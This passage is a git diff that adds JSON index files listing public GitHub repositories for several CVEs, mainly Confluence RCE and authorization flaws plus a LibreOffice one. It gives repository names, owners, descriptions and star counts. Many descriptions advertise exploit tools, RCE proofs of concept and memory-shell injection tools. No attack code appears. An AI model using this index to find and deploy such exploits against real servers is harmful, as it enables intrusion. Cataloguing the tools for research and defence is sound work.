"created_at": "2023-10-31T05:35:00Z", + "updated_at": "2024-08-26T13:45:52Z", + "pushed_at": "2023-11-15T09:22:46Z", + "stargazers_count": 55, + "watchers_count": 55, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "atlassian", + "atlassian-confluence", + "attack", + "backdoor", + "confluence", + "critical", + "cve", + "exploit", + "exploiting", + "hacking", + "hacking-tool", + "improper", + "python", + "shell", + "vulnerabilities", + "vulnerability" + ], + "visibility": "public", + "forks": 9, + "watchers": 55, + "score": 0, + "subscribers_count": 19 + }, + { + "id": 713624699, + "name": "CVE-2023-22518", + "full_name": "davidfortytwo\/CVE-2023-22518", + "owner": { + "login": "davidfortytwo", + "id": 85337431, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85337431?v=4", + "html_url": "https:\/\/github.com\/davidfortytwo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/davidfortytwo\/CVE-2023-22518", + "description": "Checker for CVE-2023-22518 vulnerability on Confluence", + "fork": false, + "created_at": "2023-11-02T22:52:15Z", + "updated_at": "2024-05-17T17:07:38Z", + "pushed_at": "2024-05-21T06:45:36Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 714542407, + "name": "CVE-2023-22518", + "full_name": "RevoltSecurities\/CVE-2023-22518", + "owner": { + "login": "RevoltSecurities", + "id": 119435129, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119435129?v=4", + "html_url": "https:\/\/github.com\/RevoltSecurities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RevoltSecurities\/CVE-2023-22518", + "description": "An Exploitation tool to exploit the confluence server that are vulnerable to CVE-2023-22518 Improper Authorization", + "fork": false, + "created_at": "2023-11-05T06:45:33Z", + "updated_at": "2024-10-26T05:46:02Z", + "pushed_at": "2023-11-05T07:08:41Z", + "stargazers_count": 44, + "watchers_count": 44, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 16, + "watchers": 44, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 716451139, + "name": "CVE-2023-22518", + "full_name": "0x0d3ad\/CVE-2023-22518", + "owner": { + "login": "0x0d3ad", + "id": 18898977, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18898977?v=4", + "html_url": "https:\/\/github.com\/0x0d3ad", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x0d3ad\/CVE-2023-22518", + "description": "Exploit CVE-2023-22518", + "fork": false, + "created_at": "2023-11-09T06:56:18Z", + "updated_at": "2024-08-28T04:28:50Z", + "pushed_at": "2023-11-09T07:42:04Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "atlassian", + "confluence", + "cve-2023-22518", + "exploit" + ], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 724424925, + "name": "CVE-2023-22518", + "full_name": "C1ph3rX13\/CVE-2023-22518", + "owner": { + "login": "C1ph3rX13", + "id": 80873500, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80873500?v=4", + "html_url": "https:\/\/github.com\/C1ph3rX13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/C1ph3rX13\/CVE-2023-22518", + "description": "Confluence CVE-2023-22518", + "fork": false, + "created_at": "2023-11-28T03:33:16Z", + "updated_at": "2023-12-20T15:07:46Z", + "pushed_at": "2023-11-28T05:44:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 747208015, + "name": "CVE-2023-22518", + "full_name": "bibo318\/CVE-2023-22518", + "owner": { + "login": "bibo318", + "id": 56821442, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56821442?v=4", + "html_url": "https:\/\/github.com\/bibo318", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bibo318\/CVE-2023-22518", + "description": "Lỗ hổng ủy quyền không phù hợp trong Trung tâm dữ liệu Confluence và Máy chủ + bugsBonus 🔥", + "fork": false, + "created_at": "2024-01-23T13:38:40Z", + "updated_at": "2024-01-24T10:15:44Z", + "pushed_at": "2024-01-24T02:04:40Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 775340661, + "name": "Exploit-CVE-2023-22518", + "full_name": "Lilly-dox\/Exploit-CVE-2023-22518", + "owner": { + "login": "Lilly-dox", + "id": 130746941, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130746941?v=4", + "html_url": "https:\/\/github.com\/Lilly-dox", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Lilly-dox\/Exploit-CVE-2023-22518", + "description": null, + "fork": false, + "created_at": "2024-03-21T07:55:00Z", + "updated_at": "2024-03-22T15:49:52Z", + "pushed_at": "2024-03-24T01:33:59Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-22524.json b/2023/CVE-2023-22524.json new file mode 100644 index 0000000000..eb93888563 --- /dev/null +++ b/2023/CVE-2023-22524.json @@ -0,0 +1,68 @@ +[ + { + "id": 731520651, + "name": "CVE-2023-22524", + "full_name": "imperva\/CVE-2023-22524", + "owner": { + "login": "imperva", + "id": 34535031, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34535031?v=4", + "html_url": "https:\/\/github.com\/imperva", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/imperva\/CVE-2023-22524", + "description": null, + "fork": false, + "created_at": "2023-12-14T09:12:11Z", + "updated_at": "2023-12-15T16:41:50Z", + "pushed_at": "2023-12-20T11:01:52Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 731664456, + "name": "CVE-2023-22524", + "full_name": "ron-imperva\/CVE-2023-22524", + "owner": { + "login": "ron-imperva", + "id": 80413188, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80413188?v=4", + "html_url": "https:\/\/github.com\/ron-imperva", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ron-imperva\/CVE-2023-22524", + "description": "Atlassian Companion RCE Vulnerability Proof of Concept", + "fork": false, + "created_at": "2023-12-14T15:33:11Z", + "updated_at": "2024-06-21T00:11:48Z", + "pushed_at": "2023-12-15T06:13:34Z", + "stargazers_count": 25, + "watchers_count": 25, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "atlassian", + "poc", + "rce" + ], + "visibility": "public", + "forks": 1, + "watchers": 25, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-22527.json b/2023/CVE-2023-22527.json new file mode 100644 index 0000000000..260a8c1a12 --- /dev/null +++ b/2023/CVE-2023-22527.json @@ -0,0 +1,749 @@ +[ + { + "id": 743909012, + "name": "CVE-2023-22527_Confluence_RCE", + "full_name": "Avento\/CVE-2023-22527_Confluence_RCE", + "owner": { + "login": "Avento", + "id": 13798539, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13798539?v=4", + "html_url": "https:\/\/github.com\/Avento", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Avento\/CVE-2023-22527_Confluence_RCE", + "description": "CVE-2023-22527 - RCE (Remote Code Execution) Vulnerability In Confluence Data Center and Confluence Server PoC", + "fork": false, + "created_at": "2024-01-16T08:46:21Z", + "updated_at": "2024-12-25T07:14:03Z", + "pushed_at": "2024-01-23T09:57:31Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 26, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 744029874, + "name": "patch-diff-CVE-2023-22527", + "full_name": "Sudistark\/patch-diff-CVE-2023-22527", + "owner": { + "login": "Sudistark", + "id": 31372554, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31372554?v=4", + "html_url": "https:\/\/github.com\/Sudistark", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sudistark\/patch-diff-CVE-2023-22527", + "description": null, + "fork": false, + "created_at": "2024-01-16T13:50:49Z", + "updated_at": "2024-01-20T05:20:44Z", + "pushed_at": "2024-01-18T14:09:39Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 744449379, + "name": "CVE-2023-22527_Confluence_RCE", + "full_name": "ga0we1\/CVE-2023-22527_Confluence_RCE", + "owner": { + "login": "ga0we1", + "id": 96734525, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96734525?v=4", + "html_url": "https:\/\/github.com\/ga0we1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ga0we1\/CVE-2023-22527_Confluence_RCE", + "description": "CVE-2023-22527 - RCE (Remote Code Execution) Vulnerability In Confluence Data Center and Confluence Server PoC", + "fork": false, + "created_at": "2024-01-17T10:21:00Z", + "updated_at": "2024-01-22T12:45:12Z", + "pushed_at": "2024-01-17T07:12:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 746624870, + "name": "CVE-2023-22527", + "full_name": "Drun1baby\/CVE-2023-22527", + "owner": { + "login": "Drun1baby", + "id": 75228348, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75228348?v=4", + "html_url": "https:\/\/github.com\/Drun1baby", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Drun1baby\/CVE-2023-22527", + "description": null, + "fork": false, + "created_at": "2024-01-22T11:38:55Z", + "updated_at": "2024-01-23T01:52:40Z", + "pushed_at": "2024-01-22T12:07:37Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 746667961, + "name": "CVE-2023-22527", + "full_name": "cleverg0d\/CVE-2023-22527", + "owner": { + "login": "cleverg0d", + "id": 108401157, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108401157?v=4", + "html_url": "https:\/\/github.com\/cleverg0d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cleverg0d\/CVE-2023-22527", + "description": "A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action.", + "fork": false, + "created_at": "2024-01-22T13:26:45Z", + "updated_at": "2024-01-23T02:20:48Z", + "pushed_at": "2024-01-22T13:31:42Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 746832699, + "name": "CVE-2023-22527", + "full_name": "thanhlam-attt\/CVE-2023-22527", + "owner": { + "login": "thanhlam-attt", + "id": 79523444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79523444?v=4", + "html_url": "https:\/\/github.com\/thanhlam-attt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thanhlam-attt\/CVE-2023-22527", + "description": null, + "fork": false, + "created_at": "2024-01-22T19:02:59Z", + "updated_at": "2024-01-27T13:26:05Z", + "pushed_at": "2024-01-25T17:54:24Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 746974310, + "name": "CVE-2023-22527-POC", + "full_name": "Manh130902\/CVE-2023-22527-POC", + "owner": { + "login": "Manh130902", + "id": 93723285, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93723285?v=4", + "html_url": "https:\/\/github.com\/Manh130902", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Manh130902\/CVE-2023-22527-POC", + "description": "A critical severity Remote Code Execution (RCE) vulnerability (CVE-2023-22527) was discovered in Confluence Server and Data Center. ", + "fork": false, + "created_at": "2024-01-23T02:17:36Z", + "updated_at": "2024-12-11T03:12:45Z", + "pushed_at": "2024-01-23T12:03:00Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 21, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 747056079, + "name": "CVE-2023-22527-confluence", + "full_name": "VNCERT-CC\/CVE-2023-22527-confluence", + "owner": { + "login": "VNCERT-CC", + "id": 94035613, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94035613?v=4", + "html_url": "https:\/\/github.com\/VNCERT-CC", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/VNCERT-CC\/CVE-2023-22527-confluence", + "description": "[Confluence] CVE-2023-22527 realworld poc", + "fork": false, + "created_at": "2024-01-23T07:10:55Z", + "updated_at": "2024-09-11T08:21:49Z", + "pushed_at": "2024-01-23T07:16:40Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 18, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 747075547, + "name": "CVE-2023-22527", + "full_name": "Vozec\/CVE-2023-22527", + "owner": { + "login": "Vozec", + "id": 61807609, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61807609?v=4", + "html_url": "https:\/\/github.com\/Vozec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vozec\/CVE-2023-22527", + "description": "This repository presents a proof-of-concept of CVE-2023-22527", + "fork": false, + "created_at": "2024-01-23T08:06:15Z", + "updated_at": "2024-03-21T17:57:09Z", + "pushed_at": "2024-01-23T09:13:39Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 13, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 747093582, + "name": "CVE-2023-22527", + "full_name": "C1ph3rX13\/CVE-2023-22527", + "owner": { + "login": "C1ph3rX13", + "id": 80873500, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80873500?v=4", + "html_url": "https:\/\/github.com\/C1ph3rX13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/C1ph3rX13\/CVE-2023-22527", + "description": "Atlassian Confluence - Remote Code Execution (CVE-2023-22527)", + "fork": false, + "created_at": "2024-01-23T08:53:46Z", + "updated_at": "2024-02-12T18:35:12Z", + "pushed_at": "2024-01-23T09:04:15Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 747107640, + "name": "CVE-2023-22527", + "full_name": "Niuwoo\/CVE-2023-22527", + "owner": { + "login": "Niuwoo", + "id": 57100441, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57100441?v=4", + "html_url": "https:\/\/github.com\/Niuwoo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Niuwoo\/CVE-2023-22527", + "description": "POC", + "fork": false, + "created_at": "2024-01-23T09:28:53Z", + "updated_at": "2024-01-23T09:58:22Z", + "pushed_at": "2024-01-24T01:28:57Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 747142530, + "name": "CVE-2023-22527", + "full_name": "Chocapikk\/CVE-2023-22527", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2023-22527", + "description": "Atlassian Confluence - Remote Code Execution", + "fork": false, + "created_at": "2024-01-23T10:55:28Z", + "updated_at": "2024-09-09T08:04:09Z", + "pushed_at": "2024-01-23T11:30:10Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 747304649, + "name": "CVE-2023-22527", + "full_name": "RevoltSecurities\/CVE-2023-22527", + "owner": { + "login": "RevoltSecurities", + "id": 119435129, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119435129?v=4", + "html_url": "https:\/\/github.com\/RevoltSecurities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RevoltSecurities\/CVE-2023-22527", + "description": "An Exploitation tool to exploit the confluence server that are vulnerable to CVE-2023-22527 leads to RCE", + "fork": false, + "created_at": "2024-01-23T17:07:15Z", + "updated_at": "2024-03-16T15:29:25Z", + "pushed_at": "2024-01-23T17:18:36Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 747516154, + "name": "CVE-2023-22527", + "full_name": "yoryio\/CVE-2023-22527", + "owner": { + "login": "yoryio", + "id": 134471901, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134471901?v=4", + "html_url": "https:\/\/github.com\/yoryio", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yoryio\/CVE-2023-22527", + "description": "Exploit for CVE-2023-22527 - Atlassian Confluence Data Center and Server", + "fork": false, + "created_at": "2024-01-24T04:44:59Z", + "updated_at": "2024-08-12T20:33:10Z", + "pushed_at": "2024-03-15T05:15:05Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "atlassian-confluence", + "cve-2023-22527" + ], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 747900455, + "name": "CVE-2023-22527", + "full_name": "Privia-Security\/CVE-2023-22527", + "owner": { + "login": "Privia-Security", + "id": 69091374, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69091374?v=4", + "html_url": "https:\/\/github.com\/Privia-Security", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Privia-Security\/CVE-2023-22527", + "description": "CVE-2023-22527", + "fork": false, + "created_at": "2024-01-24T21:29:59Z", + "updated_at": "2024-05-10T11:45:23Z", + "pushed_at": "2024-01-25T06:39:02Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 748024139, + "name": "CVE-2023-22527-POC", + "full_name": "MaanVader\/CVE-2023-22527-POC", + "owner": { + "login": "MaanVader", + "id": 103140982, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103140982?v=4", + "html_url": "https:\/\/github.com\/MaanVader", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MaanVader\/CVE-2023-22527-POC", + "description": "Atlassian Confluence Remote Code Execution(RCE) Proof Of Concept", + "fork": false, + "created_at": "2024-01-25T05:32:06Z", + "updated_at": "2024-01-28T09:48:06Z", + "pushed_at": "2024-01-25T10:42:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 748135321, + "name": "CVE-2023-22527", + "full_name": "adminlove520\/CVE-2023-22527", + "owner": { + "login": "adminlove520", + "id": 32920883, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32920883?v=4", + "html_url": "https:\/\/github.com\/adminlove520", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/adminlove520\/CVE-2023-22527", + "description": "CVE-2023-22527 - RCE (Remote Code Execution) Vulnerability In Confluence Data Center and Confluence Server PoC", + "fork": false, + "created_at": "2024-01-25T10:52:39Z", + "updated_at": "2024-04-02T17:41:19Z", + "pushed_at": "2024-01-25T10:54:57Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 751670668, + "name": "CVE-2023-22527", + "full_name": "YongYe-Security\/CVE-2023-22527", + "owner": { + "login": "YongYe-Security", + "id": 90460865, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90460865?v=4", + "html_url": "https:\/\/github.com\/YongYe-Security", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/YongYe-Security\/CVE-2023-22527", + "description": "CVE-2023-22527 Batch scanning", + "fork": false, + "created_at": "2024-02-02T04:20:14Z", + "updated_at": "2024-02-02T04:21:05Z", + "pushed_at": "2024-02-02T04:23:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 755982489, + "name": "CVE-2023-22527-Godzilla-MEMSHELL", + "full_name": "Boogipop\/CVE-2023-22527-Godzilla-MEMSHELL", + "owner": { + "login": "Boogipop", + "id": 114604850, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114604850?v=4", + "html_url": "https:\/\/github.com\/Boogipop", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Boogipop\/CVE-2023-22527-Godzilla-MEMSHELL", + "description": "CVE-2023-22527 内存马注入工具", + "fork": false, + "created_at": "2024-02-11T16:46:55Z", + "updated_at": "2024-12-27T12:29:18Z", + "pushed_at": "2024-02-21T05:49:59Z", + "stargazers_count": 74, + "watchers_count": 74, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 74, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 763294385, + "name": "CVE-2023-22527-MEMSHELL", + "full_name": "M0untainShley\/CVE-2023-22527-MEMSHELL", + "owner": { + "login": "M0untainShley", + "id": 72058581, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72058581?v=4", + "html_url": "https:\/\/github.com\/M0untainShley", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/M0untainShley\/CVE-2023-22527-MEMSHELL", + "description": "confluence CVE-2023-22527 漏洞利用工具,支持冰蝎\/哥斯拉内存马注入,支持设置 http 代理", + "fork": false, + "created_at": "2024-02-26T02:34:44Z", + "updated_at": "2024-12-29T10:33:38Z", + "pushed_at": "2024-04-24T02:34:16Z", + "stargazers_count": 38, + "watchers_count": 38, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 38, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 767136230, + "name": "cve-2023-22527", + "full_name": "vulncheck-oss\/cve-2023-22527", + "owner": { + "login": "vulncheck-oss", + "id": 134310220, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134310220?v=4", + "html_url": "https:\/\/github.com\/vulncheck-oss", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vulncheck-oss\/cve-2023-22527", + "description": "Three go-exploits exploiting CVE-2023-22527 to execute arbitrary code in memory", + "fork": false, + "created_at": "2024-03-04T19:09:57Z", + "updated_at": "2024-10-31T13:25:33Z", + "pushed_at": "2025-01-03T09:00:07Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 807402056, + "name": "Confluence-RCE", + "full_name": "BBD-YZZ\/Confluence-RCE", + "owner": { + "login": "BBD-YZZ", + "id": 132546612, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/132546612?v=4", + "html_url": "https:\/\/github.com\/BBD-YZZ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BBD-YZZ\/Confluence-RCE", + "description": "confluence rce (CVE-2021-26084, CVE-2022-26134, CVE-2023-22527)", + "fork": false, + "created_at": "2024-05-29T03:20:22Z", + "updated_at": "2024-09-22T06:25:09Z", + "pushed_at": "2024-08-26T09:24:31Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 868511070, + "name": "CVE-2023-22527", + "full_name": "kh4sh3i\/CVE-2023-22527", + "owner": { + "login": "kh4sh3i", + "id": 64693844, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64693844?v=4", + "html_url": "https:\/\/github.com\/kh4sh3i", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kh4sh3i\/CVE-2023-22527", + "description": "CVE-2023-22527 | RCE using SSTI in Confluence", + "fork": false, + "created_at": "2024-10-06T15:16:04Z", + "updated_at": "2024-11-09T21:19:35Z", + "pushed_at": "2024-10-08T14:45:46Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 868731394, + "name": "CVE-2023-22527", + "full_name": "AxthonyV\/CVE-2023-22527", + "owner": { + "login": "AxthonyV", + "id": 141282212, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/141282212?v=4", + "html_url": "https:\/\/github.com\/AxthonyV", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AxthonyV\/CVE-2023-22527", + "description": "script for exploiting CVE-2023-22527, which is described as a Server-Side Template Injection (SSTI) vulnerability in Atlassian Confluence", + "fork": false, + "created_at": "2024-10-07T04:47:56Z", + "updated_at": "2024-10-07T06:06:01Z", + "pushed_at": "2024-10-07T04:48:05Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2255.json b/2023/CVE-2023-2255.json new file mode 100644 index 0000000000..2acaf46b8f --- /dev/null +++ b/2023/CVE-2023-2255.json @@ -0,0 +1,64 @@ +[ + { + "id": 664827690, + "name": "CVE-2023-2255", + "full_name": "elweth-sec\/CVE-2023-2255", + "owner": { + "login": "elweth-sec", + "id": 39616215, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39616215?v=4", + "html_url": "https:\/\/github.com\/elweth-sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/elweth-sec\/CVE-2023-2255", + "description": "CVE-2023-2255 Libre Office ", + "fork": 